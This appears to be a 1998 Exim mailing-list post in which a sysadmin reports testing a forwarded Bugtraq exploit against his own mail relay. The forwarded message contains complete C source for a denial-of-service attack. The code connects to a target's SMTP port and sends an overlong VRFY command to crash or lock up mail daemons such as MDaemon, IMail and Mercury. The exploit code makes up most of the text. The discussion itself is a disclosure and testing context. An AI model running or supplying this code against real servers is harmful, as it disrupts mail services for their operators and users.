I tried this out against our Sparc/Ultra1 mail relay which runs gcc built
Exim1.82
it didn't seem to crash it, but it did oddly report "too many connections"
for a little while, but I'm reluctant to repeat the test to try and
destroy a live machine!
I had to add
#include <sys/types.h>
to make it build
Paul
----
P Mansfield, Senior SysAdmin PSINet, +44-1223-577577x2611/577611 fax:577600
"He who fights and runs away is wasting good running-away time".. A.J. Rimmer
---------- Forwarded message ----------
Date: Wed, 8 Apr 1998 07:10:25 -0400
From: Jon Beaton <steven@???>
To: BUGTRAQ@???
Subject: smtp overflows
There have been more posts about the buffer overflows on smtp daemons,
so I thought this may be useful. After posting about these attacks on
SLMail and Imail, I found that there were alot more that were still
affected. On the few I've tried on the Mac, like Mercury, it had locked
the server up, much like Appleshare. Anyways, this is just mdaemon.c
with just a few tiny changes, just thought it may be useful. Btw, I just
wanted to note that this will also crash IMail, even though the author
has said it wasn't affected.
Jon
/*
mdaemon.c with a few small changes.
known to lock up the whole server with some daemons on the Mac
Cisc0 @ Undernet
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char *buffer;
int sock, i;
if (argc != 2) {
printf("usage: %s <smtp server>\n", argv[0]);
exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]);
exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
buffer = (char *)malloc(1000);
sprintf(buffer, "VRFY ");
for (i = 0; i<896; i++)
strcat(buffer, "d");
strcat(buffer, "\r\n");
write(sock, &buffer[0], strlen(buffer));
close(sock);
free(buffer);
}
--
*** Exim information can be found at
http://www.exim.org/ ***